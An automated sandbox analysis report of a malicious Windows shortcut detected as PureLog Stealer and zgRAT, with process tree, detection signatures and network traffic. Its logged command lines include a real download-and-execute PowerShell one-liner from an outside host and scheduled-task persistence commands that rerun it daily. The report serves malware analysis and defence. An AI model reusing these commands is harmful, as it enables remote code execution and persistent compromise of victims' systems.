Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sv6eQZzG0Z.lnk

Overview

General Information

Sample name:Sv6eQZzG0Z.lnk
renamed because original name is a hash value
Original sample name:21c0756d52ca7947a83529e2cc7d3341f4626b8da05c256f5ec09034d147c6ba.lnk
Analysis ID:1522856
MD5:a22f05d003da4d6114cf3de35cc3c034
SHA1:cff1426f338d1e56504fb2f182157f048c6e1213
SHA256:21c0756d52ca7947a83529e2cc7d3341f4626b8da05c256f5ec09034d147c6ba
Tags:lnkSideWinderuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Windows shortcut file (LNK) starts blacklisted processes
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c start https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf; irm http://drive.desktopserver.top/file/| Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 7532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2056,i,4768736094800516795,6522799854547835148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • powershell.exe (PID: 8288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • schtasks.exe (PID: 8668 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8688 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8712 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • svchost.exe (PID: 7688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 9160 cmdline: powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 9196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • schtasks.exe (PID: 9296 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 9348 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 9412 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • powershell.exe (PID: 9180 cmdline: powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 9064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • schtasks.exe (PID: 9304 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 9356 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 9420 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • powershell.exe (PID: 9208 cmdline: powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 8544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • schtasks.exe (PID: 9280 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 9332 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 9404 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x72ae8:$s1: file:///
      • 0x729d4:$s2: {11111-22222-10009-11112}
      • 0x72a78:$s3: {11111-22222-50001-00000}
      • 0x6ba57:$s4: get_Module
      • 0x6bea1:$s5: Reverse
      • 0x71ee3:$s6: BlockCopy
      • 0x71f04:$s7: ReadByte
      • 0x72afa:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 6 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          22.2.powershell.exe.233543815c0.4.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            22.2.powershell.exe.233543815c0.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              22.2.powershell.exe.233543815c0.4.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
              • 0x72ae8:$s1: file:///
              • 0x729d4:$s2: {11111-22222-10009-11112}
              • 0x72a78:$s3: {11111-22222-50001-00000}
              • 0x6ba57:$s4: get_Module
              • 0x6bea1:$s5: Reverse
              • 0x71ee3:$s6: BlockCopy
              • 0x71f04:$s7: ReadByte
              • 0x72afa:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
              24.2.powershell.exe.1f318711390.4.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                24.2.powershell.exe.1f318711390.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 25 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8288, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f, ProcessId: 8668, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c start https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf; irm http://drive.desktopserver.top/file/| Powershell , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c start https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf; irm http://drive.desktopserver.top/file/| Powershell , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c start https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf; irm http://drive.desktopserver.top/file/| Powershell , ProcessId: 7304, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7688, ProcessName: svchost.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Schedule system process
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8288, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f, ProcessId: 8668, ProcessName: schtasks.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                  Machine Learning detection for sample
                  Source: Sv6eQZzG0Z.lnkJoe Sandbox ML: detected
                  Source: https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdfHTTP Parser: No favicon
                  Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
                  Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
                  Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.5:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.5:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49770 version: TLS 1.2
                  Source: Binary string: Adobe.pdb source: powershell.exe, 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2627405581.000002335422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: fystem.Core.pdb source: powershell.exe, 00000018.00000002.2504827631.000001F3208F8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ll\System.pdbv source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdbpdblib.pdbidh){ source: powershell.exe, 00000017.00000002.2665844721.000001CCC70CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: scorlib.pdbT source: powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdbg source: powershell.exe, 0000000B.00000002.2316263361.0000019FD2AC8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \System.pdbpdbtem.pdb: source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: powershell.exe, 0000000B.00000002.2354518966.0000019FECE45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000017.00000002.2665844721.000001CCC70CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdblf source: powershell.exe, 00000017.00000002.2656642044.000001CCC6D9C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Qib.pdb0 source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2664465867.000002335C729000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2504827631.000001F3208F8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws\dll\System.Core.pdbC source: powershell.exe, 0000000B.00000002.2352823018.0000019FECAC6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbz source: powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: scorlib.pdbbx source: powershell.exe, 00000016.00000002.2664465867.000002335C76D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: e.pdbB'2 source: powershell.exe, 0000000B.00000002.2354518966.0000019FECE08000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: orlib.pdbpdblib.pdbx source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000016.00000002.2664465867.000002335C729000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2504827631.000001F3208F8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb4 source: powershell.exe, 00000016.00000002.2664465867.000002335C729000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.2354518966.0000019FECE45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2435524082.000001F3069F6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb^ source: powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2669887405.000002335C78B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2496306256.000001F3208A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdb+H source: powershell.exe, 00000018.00000002.2507406488.000001F32094E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Adobe.pdbx source: powershell.exe, 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2627405581.000002335422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.pdb} source: powershell.exe, 00000016.00000002.2664465867.000002335C76D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000016.00000002.2664465867.000002335C76D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: $.pdbr3 source: powershell.exe, 0000000B.00000002.2352823018.0000019FECAED000.00000004.00000020.00020000.00000000.sdmp
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: 6pu1vC0lzYj5eQLGnNvoqQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: VaAdp+t3Wysgbc0tpZhxww==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: 0Q22eY78naCzrGK6GlNJOg==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: /n44b8H3mJDvHC1mW4m8Dw==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: Joe Sandbox ViewIP Address: 162.159.135.234 162.159.135.234
                  Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CYBERNET-APCyberInternetServicesPvtLtdPK CYBERNET-APCyberInternetServicesPvtLtdPK
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
